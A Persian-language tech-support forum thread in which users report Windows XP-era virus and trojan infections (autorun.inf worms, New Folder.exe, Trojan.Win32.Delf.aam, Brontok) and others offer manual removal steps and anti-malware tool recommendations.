سلام

موقع نصب jet audio plus کاسپرسکی (7) چندین بار با رنگ قرمز هشدار trojan cryptor داد ولی من اجازه ( allow ) دادم
اون طور که تو فروم خود کاسپرسکی دیدم این هشدار رو در مورد نرو و فتوشاپ cs3 هم داده
ولی نتونستم اطلاعاتی در مورد این تروجان کسب کنم

ایا این تروجان خطرناکه؟

با تشکر

سلام. ویندوز من یک سری مشکلات داره . در ضمن ویندوزم SP3 هستش و مثل اینکه ساخته یه نفره چون وقتی میخواد بیاد بالا پایین اون صفحه که نوشته windows XP و یه آرم هم هست یه آی دی نوشته .
1.control panel > system باز نمیشه
2.رنگ ویندوز از 32 bit میشه 16 bit
3.همه چی جدیدن دیر اجرا میشه
4.چند تا از گزینه های دیگه تو کنترل پانل اجرا نمیشن
5. در مورد این ویندوز هم یه توضیحی بدید .

:41: چند وقته سيستم تروجان Win32/VB.ATG trojanگرفته اول با کاسپر ميخواستم پاک کنم نشد بعد با ناد 32 تونستم اونو شناسايي و بعد اونو پاک کنم ولي الان چند تا مشکل دارم
1-هنگام راست کليک رو درايو ها به جاي گزينه OPEN گزينه AUTO است
2-فايل هاي مخفي رو نميتونم به حالت نمايش در بيارم
پست هاي قبلي رو هم خوندم ولي با اينکه کارهاي گفته شده رو انجام دادم مشکلم حل نشد![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

براي پاك كردن گزينه auto
اول از قسمتtools-->folder options-->view
گزينه show hiden files and folders را انتخاب و تيك جلوي hide protected operating system files را برداريد.
حالا به پارتيشن مورد نظر رفته و فايل autoplay.inf يا auto.inf و كليه فايلهايي كه در recycler هستند را پاك كنيد.
اميدوارم مشكلتان حل شود در اصل همين كار را براي فلش مموريم انجام دادم

کسی جوابی به ما نداده ها !!!

سلام
سيستم من چن وقتي حالش بده
سي دي را هي ميا بيرون ميره تو مياد بيرون ميره تو .....
البته هميشه اين جوري نيست يه وقتايي اصلا اين جوري نمي شه ولي يه وقتايي حالش خيلي بد مي شه .
در ضمن آنتي ويروسم چيزي را شنا سايي نمي كنه . البته يه گزينه تو منو startup هست كه هر كاري مي كنم تيكش برداشته نمي شه
اينه ddalaaaa
حالا چه بكنم؟

سلام به همه دوستان
يه ويروسي هست كه وقتي ميخوايم يه پوشه رو كپي كنم، بجاي پوشه و محتويات پوشه، يه فايل exe با نام همون پوشه درست ميكنه. من فقط اسم ويروس و هر اطلاعاتي كه در موردش ميتونين بدين رو ميخوام، مشكل من اسم ويروس هست، آنتي ويروس نميخوام.
با تشكر

سلام به همه دوستان
يه ويروسي هست كه وقتي ميخوايم يه پوشه رو كپي كنم، بجاي پوشه و محتويات پوشه، يه فايل exe با نام همون پوشه درست ميكنه. من فقط اسم ويروس و هر اطلاعاتي كه در موردش ميتونين بدين رو ميخوام، مشكل من اسم ويروس هست، آنتي ويروس نميخوام.
با تشكر
صفحات قبل رو بخونید........


چند وقته سيستم تروجان Win32/VB.ATG trojanگرفته اول با کاسپر ميخواستم پاک کنم نشد بعد با ناد 32 تونستم اونو شناسايي و بعد اونو پاک کنم ولي الان چند تا مشکل دارم
1-هنگام راست کليک رو درايو ها به جاي گزينه OPEN گزينه AUTO است
2-فايل هاي مخفي رو نميتونم به حالت نمايش در بيارم
پست هاي قبلي رو هم خوندم ولي با اينکه کارهاي گفته شده رو انجام دادم مشکلم حل نشد!

سلام......... شاید دو تا ویروس رو همزمان گرفتین! از اونجایی که میگین نمیتونید فایلای مخفی رو به حالت نمایش در بیارین ممکنه ویروس new folder باشه.......... اما وقتی میگین به درایواتون auto run اضافه شده اون یه ویروس دیگست که اتفاقا همین امروز یقمو گرفته بود! اما خوب، تونستم بدون آنتی ویروس پاکش کنم :happy:

من اول تمام اسمایی که توی قسمت process توی تسک منیجر مشکوک بودن رو بستم......... بعد توی همه ی درایوا فایل fun.xls و autoran.INF رو پاک کردم، و چون ویروس رو بسته بودم دیگه خودشو کپی نمیکرد........ بعد توی رجیستری به قسمتی که لیست Startup ها هستن رو نگاه کردم و اونایی که مشکوک بودن رو دلیت کردم، و اینطوری کلا از قسمت MSconfig هم پاک شدن........ بعد سیستم رو ریست کردم و وقتی اومد بالا دیگه مشکلی نبود....... مثل اولش شده بود :)

موفق باشید :)

صفحات قبل رو بخونید........



سلام......... شاید دو تا ویروس رو همزمان گرفتین! از اونجایی که میگین نمیتونید فایلای مخفی رو به حالت نمایش در بیارین ممکنه ویروس new folder باشه.......... اما وقتی میگین به درایواتون auto run اضافه شده اون یه ویروس دیگست که اتفاقا همین امروز یقمو گرفته بود! اما خوب، تونستم بدون آنتی ویروس پاکش کنم :happy:

من اول تمام اسمایی که توی قسمت process توی تسک منیجر مشکوک بودن رو بستم......... بعد توی همه ی درایوا فایل fun.xls و autoran.INF رو پاک کردم، و چون ویروس رو بسته بودم دیگه خودشو کپی نمیکرد........ بعد توی رجیستری به قسمتی که لیست Startup ها هستن رو نگاه کردم و اونایی که مشکوک بودن رو دلیت کردم، و اینطوری کلا از قسمت MSconfig هم پاک شدن........ بعد سیستم رو ریست کردم و وقتی اومد بالا دیگه مشکلی نبود....... مثل اولش شده بود :)

موفق باشید :)
همه کارها رو انجام دادم دوست عزیز درایو C که فرمت شد برای نصب ویندوز دیگه مشکلی نداره ولی درایو های دیگه هنوز مشکل دارن این دو تا فایل هم هر چی سرچ دادم پیدا نشد که نشد

همه کارها رو انجام دادم دوست عزیز درایو C که فرمت شد برای نصب ویندوز دیگه مشکلی نداره ولی درایو های دیگه هنوز مشکل دارن این دو تا فایل هم هر چی سرچ دادم پیدا نشد که نشد
بله......... در واقع به این دلیل هست که فایلی به نام Autorun.inf توی اون درایو هست....... شما توی قسمت فولدر آپشنس تیک نشان ندادن فایلهای Operating System رو بردار و بعد درایو ها رو دوباره ببین

موفق باشی :)

سلام. یه سری spyware اومده تو پی سی ٍ من، وقتی با zone alarm و spy remover پاکش میکنم، بازم وجود داره و alert میده. چطوری پاکشون کنم ؟ با چی ؟ با احترام و تشکر.

سلام. یه سری spyware اومده تو پی سی ٍ من، وقتی با zone alarm و spy remover پاکش میکنم، بازم وجود داره و alert میده. چطوری پاکشون کنم ؟ با چی ؟ با احترام و تشکر.

دوست عزیز

هیچکدام از این دو آنتی اسپایور مناسبی حساب نمی شوند در ضمن شما اسم و مشخصات این اسپایور را ننوشته اید در

هر حالت توصیه من استفاده از سوپر آنتی اسپایور است که رایگان است و کمتر اسپایوری از زیر دستش در می رود :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما این انتی اسپایور را داونلود و آپدیت کن , System Restore را غیر فعال کن و کل سیستم را اسکن و هرچه را پیدا

کرد پاک کن .اگر باز مشکل باقی ماند نام و مشخصات اسپایورهای باقیمانده را بگو تا دقیقتر بتوان کمکت کرد.

تو سيستم من يه چيزي شبيه ويروس هست با نام New Folder.exe كه با اجراي اون My Document باز ميشه و آنتي ويروسم رو از كار انداخته ونمي ذاره ويندوز تسك منجر رو باز كنم. در ضمن رجيستري اديتور هم باز نميشه. لطفاً منو راهنمايي كنيد.

نحوه ی کامل پاک کردن ویروس نیو فولدر در لینک زیر
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Administratot ممنون از آدرس دادنت. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دوست عزیز

هیچکدام از این دو آنتی اسپایور مناسبی حساب نمی شوند در ضمن شما اسم و مشخصات این اسپایور را ننوشته اید در

هر حالت توصیه من استفاده از سوپر آنتی اسپایور است که رایگان است و کمتر اسپایوری از زیر دستش در می رود :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

شما این انتی اسپایور را داونلود و آپدیت کن , System Restore را غیر فعال کن و کل سیستم را اسکن و هرچه را پیدا

کرد پاک کن .اگر باز مشکل باقی ماند نام و مشخصات اسپایورهای باقیمانده را بگو تا دقیقتر بتوان کمکت کرد.

ممنون ... اما چطور system restore را غیر فعال کنیم ؟

و ضمنا آنتی بسیار توپیه ! عالی بود

ممنون ... اما چطور system restore را غیر فعال کنیم ؟

برو به Control Panel و کارهای زیر رو از شماره 1 تا 4 بنوبت انجام بده.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Thank You ...

سلام
من احساس ميكنم كامپيوترم يه ويروس گرفته كه وقتي وارد يه فولدر ميشم اون فولدر با بقيه فرق ميكنه
حجمشم 37 كيلو بايت ميشه
حتي وقتي از اون فولدر براي گوشي چيزي ميريزي فولدر گوشي هم ديگه چيزي نشون نميده :41:
ممنون ميشم اگه كمك كنيد
كيان

آخرین آنتی ویروس کسپرسکی با آخرین آپدیت کارت رو حل میکنه

آخرین آنتی ویروس کسپرسکی با آخرین آپدیت کارت رو حل میکنه

feli عزيز اين ويروس ياب با آپديت آخرش تو بازار هست يا بايد از اينترنت دانلود بشه ؟
ممنون
كيان

از اينترنت اپديتش كن بهتره تا بري پول واسش بدي

رو سيستم من يه ويروس بودکه اجازه نميداد وارد درايو هاردم بشم و تمن بايد Open ميکردم تا واردش بشم.
کاسپر شناسايي کرد و ازبين برد ولي يکي از درايوام هنوز همونطور مونده.کاسپر چون فايل ويروس رو پاک کرده الان براي وارد شدن همش اون فايل رو گير ميده.اسم فايلش FS6519.dll.vbs

سلام
جدیدا یه ویروسی افتاده درون کامپیوتر من که از طریق MP3 پلیر افتاده توی کامپیوتر عملکرد این ویروس به گونه است که هنگامی که پلیر را به دستگاه وصل میکردم MP3 پلیر open نمیشد و از طریق Explore باز میشد اما حالا به گونه ای شده که وقتی کلیک راست میکنم یه سری چرت و پرت با حروف نامشخص مینویسه و مدام تا وصل میکنم اروری را میده که وقتی یه سی دی در حال کار باشه و سی دی را بکشی بیرون ارور قرمزه را میگم بعد تمام local setting و سیستم را به هم ریخته هر آنتی ویروسی روی دستگاه نصب نمیشه فعلا فقط AVG 7.5 ریخته میشه ولی Update قدیمی اگه میشه یه راهنمایی کنید .
فقط خواهش میکنم سریع چون تمام کارم لنگه اگه ویندوز را هم پاک کنم بازم تا پلیر را وصل کنم دوباره اینطوری میشه یه راهنمایی کنید که این ویروس را از ریشه پاک کنم.
ممنونم.

رو سيستم من يه ويروس بودکه اجازه نميداد وارد درايو هاردم بشم و تمن بايد Open ميکردم تا واردش بشم.
کاسپر شناسايي کرد و ازبين برد ولي يکي از درايوام هنوز همونطور مونده.کاسپر چون فايل ويروس رو پاک کرده الان براي وارد شدن همش اون فايل رو گير ميده.اسم فايلش FS6519.dll.vbs

کاسپرسکی با چه نامی ویروس را شناسایی کرده بود ؟

سلام
جدیدا یه ویروسی افتاده درون کامپیوتر من که از طریق MP3 پلیر افتاده توی کامپیوتر عملکرد این ویروس به گونه است که هنگامی که پلیر را به دستگاه وصل میکردم MP3 پلیر open نمیشد و از طریق Explore باز میشد اما حالا به گونه ای شده که وقتی کلیک راست میکنم یه سری چرت و پرت با حروف نامشخص مینویسه و مدام تا وصل میکنم اروری را میده که وقتی یه سی دی در حال کار باشه و سی دی را بکشی بیرون ارور قرمزه را میگم بعد تمام local setting و سیستم را به هم ریخته هر آنتی ویروسی روی دستگاه نصب نمیشه فعلا فقط AVG 7.5 ریخته میشه ولی Update قدیمی اگه میشه یه راهنمایی کنید .
فقط خواهش میکنم سریع چون تمام کارم لنگه اگه ویندوز را هم پاک کنم بازم تا پلیر را وصل کنم دوباره اینطوری میشه یه راهنمایی کنید که این ویروس را از ریشه پاک کنم.
ممنونم.

دوست عزیز

ما در این انجمن برای این گونه موارد تاپیک جداگانه ای داریم و نیازی به ایجاد یک تاپیک مجزا نیست . برای حل مشکلتان اطلاعات

بیشتری لازم است اولا نگفتید کدام آنتی ویروسها را نتوانسته اید نصب کنید وچرا ؟ دوم اینکه خود AVG آنتی ویروس بسیار خوبی

است آیا سیستمتان را با آن اسکن کرده اید و آیا چیزی پیدا کرده است یا نه ؟ برای آغاز من توصیه می کنم AVG را آپدیت کنید , System Restore

را غیر فعال کنید و در حالت Safe Mode سیستم را با آن اسکن کنید .اگر مشکل حل نشد بگویید تا راههای دیگر را امتحان کنیم.

رو سيستم من يه ويروس بودکه اجازه نميداد وارد درايو هاردم بشم و تمن بايد Open ميکردم تا واردش بشم.
کاسپر شناسايي کرد و ازبين برد ولي يکي از درايوام هنوز همونطور مونده.کاسپر چون فايل ويروس رو پاک کرده الان براي وارد شدن همش اون فايل رو گير ميده.اسم فايلش FS6519.dll.vbs
سلام..........

فایلا رو از حالت مخفی در بیارید......... بعد توی همون درایو فایل Autorun.inf رو دلیت کنید........... یه ری استارت یا لاگ آف هم لازمه :)

شاد باشید :)

با سلام خدمت دوستان. این ویروس فایل های تصویری را آلوده و پاک می کند.روش کارش هم به این صورته که وقتی رو یه فلدر کلیک می کنی یه پسوند Exe بش اضافه می کنه و بعد وقتی مثلا تو فتوشاپ می خای از اون شاخه عکسی رو باز کنی اصلا اون شاخه نشون داده نمیشه. با کاسپرسکی آپدیت دیروز چک کردم ویروس رو به این اسم می شناسه :
trojan.win32.delf.aam. منتها فقط فعالیت این ویروس رو محدود می کنه ولی برای فایل های از دست رفته کاری نمیشه کرد. اگه دوستان راهی سراغ دارن یا روشی برای از بین بردنش می دونن لطفا کمک کنن. با تشکر

با سلام
نام دقیق این برنامه ی مخرب Trojan.Win32.Delf.aam است .
با زبان برنامه نویسی Borland Delphi نوشته شده .
آیکون این Malware * مانند کرم های New Folder.exe و BronTok.A شبیه آیکون یک پوشه است !
بنابراین به سرعت منتشر می شود .
این برنامه ی مخرب تمام پوشه های Open شده توسط قربانی را Super Hidden می کند و یک نسخه از خودش را با همان نام در همان مـسـیـر کـپـی می کـنـد کـه اگـر Victim * آن را اجرا کـنـد هم Malware اجرا می شـود و هم محـتـوی پوشـه ی Super Hidden نمایـش داده می شود !!
یعنی اگه Victim مبتدی باشه به زودی متوجه نمیشه که چه بلایی داره سر پوشه هاش میاد !
هــمــانــطـــور کـه می دانـیــد برای آشـکار کـردن فایـل ها و پوشـه های Super Hidden باید ابتدا در Folder Options\View روی گزینه ی Show hidden files and folders کلیک کنید و پس از آن تیک گزینه ی (Hide protected operating system files (Recommended را بردارید و به پیغام امنیتی پاسخ مثبت و شستی OK را فشار دهید .
این Malware به Victim اجازه ی آشکار کردن پوشه ها و فایل های Super Hidden را نمی دهد !
ضمنا Registry Tools ، Windows Task Manager و Folder Options را Disable نمی کند .
پر واضح است که این برنامه ی مخرب از آشکار کردن پسوند فایل ها هم جلوگیری می کنه !
برای پاک کردن این ویروس می توانید از برنامه ای که نوشتم استفاده کنید .
مزیت این برنامه نسبت به Kill BronTok.A و Kill New Folder.exe اینه که امکان Search هم بهش اضافه شده !
Anti Trojan.Win32.Delf.aam تمام پوشه های Super Hidden را به حالت Normal بر می گرداند .

ریموور ان را از اینجا دانلود کنید:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
منبع:P30world

بعد از پاک کردن ویروس copy توسط کسپراسکای چی کار باید کرد تا موقع باز کردن درایو ها ارور نده

:11:
از برنامه ای که دادم استفاده کردی بزودی برات آدرس رجستری رو می ذارم

ممنون. آره از اون برنامه استفاده کردم. ولی فایده نداشت. پس چرا کد رجیستری رو نذاشتی؟ من خیلی وقته منتظرم. دستت درد نکنه.

با سلام
برای پاک کردن این ویروس چون این ویروس بعضی از فایلهای سیستمی را الوده می کند شما باید این فایلهای الوده ی سیستم را تعمیر کنید
برای این کار در cmd تایپ کنید sfc /scannow
تا فایلهای الوده ی سیستم شما باز گردانی شود با فایلهای سالم جایگزین شود
وارد مای کامپیوتر شده و کاری کنید که فایلهای مخفی قابل دیدن شود
برای این کار مسیر زیر را دنبال کنید :
Mycomputer>Folderoption>View
ود زیر پنجره ی view
یعنی Hiddenfiles and folder
Show Hidden files and folder
را کلیک کنید
بعد از این کار وارد هر درایو شوید و فایلی به نام :(Autorun.inf)
را پاک کنید تا دیگه با اون ارور مواجه نشید
به طور کل این ویروس از یک فایل .INF و یک فایل .EXE
تشکیل شده
این هم پاک کننده ی فایلهای Autrun.inf
کافی شما این را در همه ی درایو های خود اجرا کنید همه ی درایو های خود
اگر مخفی باشه پاک میکنه
لینک دانلود (مستقیم):
حجم:23kb

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام..........

فایلا رو از حالت مخفی در بیارید......... بعد توی همون درایو فایل Autorun.inf رو دلیت کنید........... یه ری استارت یا لاگ آف هم لازمه :)

شاد باشید :)

مشکل همينجاست.اصلا فايل autorun.inf وجود نداره.مخفي هم نيست.همينه که من کلي حيرونم.

با سلام
نام دقیق این برنامه ی مخرب Trojan.Win32.Delf.aam است .
با زبان برنامه نویسی Borland Delphi نوشته شده .
آیکون این Malware * مانند کرم های New Folder.exe و BronTok.A شبیه آیکون یک پوشه است !
بنابراین به سرعت منتشر می شود .
این برنامه ی مخرب تمام پوشه های Open شده توسط قربانی را Super Hidden می کند و یک نسخه از خودش را با همان نام در همان مـسـیـر کـپـی می کـنـد کـه اگـر Victim * آن را اجرا کـنـد هم Malware اجرا می شـود و هم محـتـوی پوشـه ی Super Hidden نمایـش داده می شود !!
یعنی اگه Victim مبتدی باشه به زودی متوجه نمیشه که چه بلایی داره سر پوشه هاش میاد !
هــمــانــطـــور کـه می دانـیــد برای آشـکار کـردن فایـل ها و پوشـه های Super Hidden باید ابتدا در Folder Options\View روی گزینه ی Show hidden files and folders کلیک کنید و پس از آن تیک گزینه ی (Hide protected operating system files (Recommended را بردارید و به پیغام امنیتی پاسخ مثبت و شستی OK را فشار دهید .
این Malware به Victim اجازه ی آشکار کردن پوشه ها و فایل های Super Hidden را نمی دهد !
ضمنا Registry Tools ، Windows Task Manager و Folder Options را Disable نمی کند .
پر واضح است که این برنامه ی مخرب از آشکار کردن پسوند فایل ها هم جلوگیری می کنه !
برای پاک کردن این ویروس می توانید از برنامه ای که نوشتم استفاده کنید .
مزیت این برنامه نسبت به Kill BronTok.A و Kill New Folder.exe اینه که امکان Search هم بهش اضافه شده !
Anti Trojan.Win32.Delf.aam تمام پوشه های Super Hidden را به حالت Normal بر می گرداند .

ریموور ان را از اینجا دانلود کنید:[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
منبع:P30world



nدوست عزیز واقعا ممنون.از دیروز تا حالا اعصابم از این موضوع خورد بود اما با کمک شما مشکلم حل شد ولی فقط یک مشکل دیگه هست اونم اینکه انتی ویروس شما فقط تا درایو g من رو اسکن کرد. من 2 تا دریو دیگه دارم اما نمی دونم چرا اون 2 تا رو اسکن نکرد؟

دوست عزیز مشکلم رفع شد. امید وارم هر چی از خدا می خواهی دست رد به سینت نزنه و بهت بده.

اگه ایراد نداره یک مشکل دیگه رو مطرح کنم !

وقتی که اینترنت کانکت میشود جدیدا زمانی حدود 1-2 دقیقه سیستم هنگ میکنه و بعد صفحات باز میشوند ...

علت چیه ؟( مک آفی و سوپرآنتی اسپای وار هم نصب هست) :11:

اگه ایراد نداره یک مشکل دیگه رو مطرح کنم !

وقتی که اینترنت کانکت میشود جدیدا زمانی حدود 1-2 دقیقه سیستم هنگ میکنه و بعد صفحات باز میشوند ...

علت چیه ؟( مک آفی و سوپرآنتی اسپای وار هم نصب هست) :11:

کدام برنامه باعث هنگ می شود ( بیشترین مقدار CPU یا RAM را اشغال می کند ) ؟

آقا من سیتم دوستم ویروسی بود
ندنستم یه رم موبایل که مال اون بود وصل کردم به سیستم
الان وقتی میخوای از بالای صفحه از گزینه تولز فولدر آپشن رو انتخاب کنم. اصلا فولدر آپشن وجود نداره!!
بعدش یه مقداری از سرعت سیتمم کم شده تقریبا مثل پست بالا و لی خیلی کمتر
باید چی کارکنم؟؟؟

با سلام به همه دوستان
من از آنتی ویروس کاسپرسکی استفاده می کنم. چند روزی است که سیستم من آلوده شده است. کاسپرسکی پیغام یافتن Trojan.Generic می دهد اما قادر به پاک کردن آن نیست یا حداقل من به خوبی اون رو پاک نمی تونم بکنم. لطفا توضیحاتی در مورد این تروجان بدهید و روش حذف آن. آیا وقتی آنتی ویروسی قادر به پاک کردن ویروسی نباشد راهی هست که بدون نصب دوباره ویندوز ویروسها را از بین برد.

یک راه حل جالب:

دعا کنید ویروسه پاک بشه

با سلام به همه دوستان
من از آنتی ویروس کاسپرسکی استفاده می کنم. چند روزی است که سیستم من آلوده شده است. کاسپرسکی پیغام یافتن Trojan.Generic می دهد اما قادر به پاک کردن آن نیست یا حداقل من به خوبی اون رو پاک نمی تونم بکنم. لطفا توضیحاتی در مورد این تروجان بدهید و روش حذف آن. آیا وقتی آنتی ویروسی قادر به پاک کردن ویروسی نباشد راهی هست که بدون نصب دوباره ویندوز ویروسها را از بین برد.
به صفحات قبل نگاه کنید........ واسه بستن ویروس تو تسک منیجر قسمت Process دنبال algsrvs.exe بگردین و بعد اونو ببندین.......... بعد اسکن کنید و احتمالا ویروس پاک میشه.........

من از نورتون استفاده کردم و تونست پاک کنه...... آخرین آپدیت رو از سایت سیمانتک میتونید بگیرید :)

موفق باشید :)

آقا ویروس عکس خور!
کمکم کنید. خواهش می کنم!
دو روزی می شه که نمی دونم چه بلایی سر کام÷یوترم اومده. همه چیم به هم ریخته.
هر چی ÷وشه ی عکس دارم هست ولی توشون خالی شده. این اون ÷وشه هاییه که رفتم توش. ولی اونایی رو که نرفتم هم بعد اتقال دادم رو یه کام÷یتور دیگه از کلی عکس تو هر ÷وشه فقط 5 یا 6 تا عکس مونده. می ترسم بقیه ی ÷وشه هامو باز کنم. کل ÷وشه های صوت و متن و فیلممو با فلش انتقال دادم به یه کام÷یوتر دیگه ولی یکی از صوتای انتقالی را حواسم نبود باز کردم. الان همین بلا سر اون کام÷یوتر هم اومده و نصف بیشتر عکساش نابود شدن. راستی تو ین کام÷یوتر یه بار ÷یام dont send با این عنوان اومد:pavsrv.exe
نمی دونم به ویرسه ربط داره یا نه. یه مشکل دیگه اینه که آخه من سایتی نرفتم که, یه دونه یاهو و همین ÷ی سی ورلد و سایت دانشگاه. یعنی یه جورایی مطمئنم که از اینترنت برام ویروس نیومده. ارتباط با کام÷یوتر دیگه هم فقط یه دونه فلشمو چند روز ÷یش به کام÷یوتر دوستم زدم که اونم خودش که می گه کام÷یوترم هیچ مشکلی نداره و هیچ ویروسی نداره.
الانم کل مطالب کام÷یوترمو زدم رو سی دی و فلش و دوباره ویندوز نصب کردم. ولی کل این مطالبو می خوام. از طرفی هم می ترسم که اونا رو وارد کام÷یوتر کنمو دوباره این مشکل برام ÷یش بیاد.
راستی من داشتم با بلوتوث و عکسای انتقالی از موبایل ور می رفتم که این بلا سرم اومد.
خواهش می کنم کمکم کنید! راستی من به مطالبی که رو سی دی وفلش زدم نیاز فوری دارم. خواهشا هر چی زودتر هر کی می تونه کمکم کنه.
ممنونم.

راستی من ویروس یابم مکافی بود و بعد هم ÷اندا رو نصب کردم ولی هیچی نشون ندادن.
(برا نصب ویندوزم همه ی درایوامو فرمت کردم)

آقا ویروس عکس خور!
کمکم کنید. خواهش می کنم!
دو روزی می شه که نمی دونم چه بلایی سر کام÷یوترم اومده. همه چیم به هم ریخته.
هر چی ÷وشه ی عکس دارم هست ولی توشون خالی شده. این اون ÷وشه هاییه که رفتم توش. ولی اونایی رو که نرفتم هم بعد اتقال دادم رو یه کام÷یتور دیگه از کلی عکس تو هر ÷وشه فقط 5 یا 6 تا عکس مونده. می ترسم بقیه ی ÷وشه هامو باز کنم. کل ÷وشه های صوت و متن و فیلممو با فلش انتقال دادم به یه کام÷یوتر دیگه ولی یکی از صوتای انتقالی را حواسم نبود باز کردم. الان همین بلا سر اون کام÷یوتر هم اومده و نصف بیشتر عکساش نابود شدن. راستی تو ین کام÷یوتر یه بار ÷یام dont send با این عنوان اومد:pavsrv.exe
نمی دونم به ویرسه ربط داره یا نه. یه مشکل دیگه اینه که آخه من سایتی نرفتم که, یه دونه یاهو و همین ÷ی سی ورلد و سایت دانشگاه. یعنی یه جورایی مطمئنم که از اینترنت برام ویروس نیومده. ارتباط با کام÷یوتر دیگه هم فقط یه دونه فلشمو چند روز ÷یش به کام÷یوتر دوستم زدم که اونم خودش که می گه کام÷یوترم هیچ مشکلی نداره و هیچ ویروسی نداره.
الانم کل مطالب کام÷یوترمو زدم رو سی دی و فلش و دوباره ویندوز نصب کردم. ولی کل این مطالبو می خوام. از طرفی هم می ترسم که اونا رو وارد کام÷یوتر کنمو دوباره این مشکل برام ÷یش بیاد.
راستی من داشتم با بلوتوث و عکسای انتقالی از موبایل ور می رفتم که این بلا سرم اومد.
خواهش می کنم کمکم کنید! راستی من به مطالبی که رو سی دی وفلش زدم نیاز فوری دارم. خواهشا هر چی زودتر هر کی می تونه کمکم کنه.
ممنونم.
سلام.......

عزیز شما چرا به صفحات قبل یه نگاه نمیندازین؟ یا حد اقل یه سرچ کنید! تو درایوتون هیچی کپی نکنید........ از نرم افزار Recover My Files استفاده کنید، راحت همه ی عکساتونو میتونید برگردونید....... الآن دیگه اکثر آنتی ویروسا شناسایی میکنن........ شما کسپر اسکای یا نورتون نصب کنید، بعد آپدیت کنید..........

موفق باشید :)

من نمی دونم باید تو سرچ چی بزنم. تازه هر وقت هم تو ÷ی سی ورلد با سرچ کار کردم به نتیجه نرسیدم. می شه بگید توضیحات کامل رو از کدوم صفحه ÷یدا کنم؟ آخه تعداد صفحات خیلی زیاده.
بعد الان که من مطالبو ریختم تو سی دی و فلش, چی کار کنم؟ اول اونا رو وارد کام÷یوتر کنم و بعد از این نرم افزار استفاده کنم؟ بعد یه چیز دیگه این که این نرم افزارو راحت می تونم از مغازه های سی دی فروشی ÷یدا کنم یا نه؟
خیلی ممنونم.

من کامپیوترم ویروسی شده هیچ آنتی ویروسی رو هم نصب نکرده بودم قبلا

الانم نمیتونم هیچ آنتی ویروسی نصب کنم کلا اکثر برنامه هارو نمیتونم نصب کنم

حتی پنجره ADD/remove program رو که میخوام باز کنم میپره.

cpu هم 100% اشغال شده . فکر کنم از ویروس ها magic ps برا یاهو درست میکنن باشه


من الان باید چیکار کنم؟؟؟؟ :41::41:

من کامپیوترم ویروسی شده هیچ آنتی ویروسی رو هم نصب نکرده بودم قبلا

الانم نمیتونم هیچ آنتی ویروسی نصب کنم کلا اکثر برنامه هارو نمیتونم نصب کنم

حتی پنجره ADD/remove program رو که میخوام باز کنم میپره.

cpu هم 100% اشغال شده . فکر کنم از ویروس ها magic ps برا یاهو درست میکنن باشه


من الان باید چیکار کنم؟؟؟؟ :41::41:

بهترین کار فورمت و نصب دوباره ویندوز است در این حالت پاک کردن این ویروس کمی مشکل است به دردسرش نمی ارزد.

آقا من سیتم دوستم ویروسی بود
ندنستم یه رم موبایل که مال اون بود وصل کردم به سیستم
الان وقتی میخوای از بالای صفحه از گزینه تولز فولدر آپشن رو انتخاب کنم. اصلا فولدر آپشن وجود نداره!!
بعدش یه مقداری از سرعت سیتمم کم شده تقریبا مثل پست بالا و لی خیلی کمتر
باید چی کارکنم؟؟؟

احتمالا تروجان Brontok است این برنامه را داونلود کن و روی سیستمت اجرا کن تا تروجان را پاک کند :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر مشکلت حل نشد بگو تا چاره دیگری بکنیم.

با سلام به همه دوستان
من از آنتی ویروس کاسپرسکی استفاده می کنم. چند روزی است که سیستم من آلوده شده است. کاسپرسکی پیغام یافتن Trojan.Generic می دهد اما قادر به پاک کردن آن نیست یا حداقل من به خوبی اون رو پاک نمی تونم بکنم. لطفا توضیحاتی در مورد این تروجان بدهید و روش حذف آن. آیا وقتی آنتی ویروسی قادر به پاک کردن ویروسی نباشد راهی هست که بدون نصب دوباره ویندوز ویروسها را از بین برد.

دوست عزیز

این یک اخطار از سرویس PDM کاسپرسکی است و معنی این آن است که یکی از پروسه های موجود بر روی سیستم

شما فعالیتی شبیه به یک تروجان از خودش نشان می دهد ( مثلا می خواهد خود را به لیست Startup ویندوز اضافه

کند ) حالا این برنامه می تواند واقعا یک تروجان باشد یا یک برنامه بی خطر که رفتاری شبیه به تروجان دارد .آن پیغام قرمز

رنگی که این اخطار را اعلام می کند حاوی اطلاعات کافی در این مورد است اگر می توانی خودت اطلاعات موجود در این

پیغام را بخوان ببین به چه برنامه ای گیر داده است اگر برنامه ای بود که آن را نمی شناسی آن را بلوک کن و فایل

اصلی را روی هارد از بین ببر ولی اگر برنامه ای است که آن را می شناسی و به ان اعتماد داری آن را می توانی به

لیست برنامه های قابل اعتماد اضافه کنی تا دیگر برنامه اخطار ندهد .اگر قادر به این کار نیستی یا اطلاعات موجود در

اخطار را اینجا بنویس ( هم صفحه اصلی هم قسمت More Information ) یا عکس این دو قسمت را برایمان بگذار.

یک راه حل جالب:

دعا کنید ویروسه پاک بشه

دوست من

اگر شما با این روش ویروسهای موجود در سیستمتان را پاک می کنید مختارید ولی لطفا ان را به بقیه توصیه نکنید.:46:

آقا ویروس عکس خور!
کمکم کنید. خواهش می کنم!
دو روزی می شه که نمی دونم چه بلایی سر کام÷یوترم اومده. همه چیم به هم ریخته.
